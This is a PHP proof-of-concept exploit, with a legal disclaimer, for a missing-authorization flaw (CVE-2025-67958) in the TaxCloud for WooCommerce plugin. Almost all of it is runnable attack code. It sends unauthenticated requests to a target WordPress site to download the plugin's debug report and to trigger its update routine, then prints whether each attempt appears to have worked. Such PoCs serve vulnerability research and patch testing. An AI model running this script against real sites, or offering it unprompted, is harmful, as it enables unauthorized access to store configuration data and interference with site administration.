// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-67958 - TaxCloud for WooCommerce <= 8.3.8 - Missing Authorization

$target_url = 'http://target-site.com'; // CHANGE THIS

// PoC 1: Trigger unauthorized debug report download
$debug_url = $target_url . '/wp-admin/admin.php?page=wc-settings&tab=integration&section=taxcloud-integration&download_debug_report=true';

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $debug_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); // The plugin may trigger a file download
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$content_type = curl_getinfo($ch, CURLINFO_CONTENT_TYPE); // Read before the handle is closed
curl_close($ch);

if ($http_code == 200 && (strpos($response, 'debug') !== false || $content_type == 'application/octet-stream')) {
    echo "[+] Debug report download likely successful. Check response for file data.\n";
} else {
    echo "[-] Debug report download may have failed. HTTP Code: $http_code\n";
}

// PoC 2: Trigger unauthorized plugin update process
$update_url = $target_url . '/wp-admin/?do_sst_update=true';

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $update_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code == 200) {
    echo "[+] Update trigger request sent.\n";
} else {
    echo "[-] Update trigger request failed. HTTP Code: $http_code\n";
}

?>
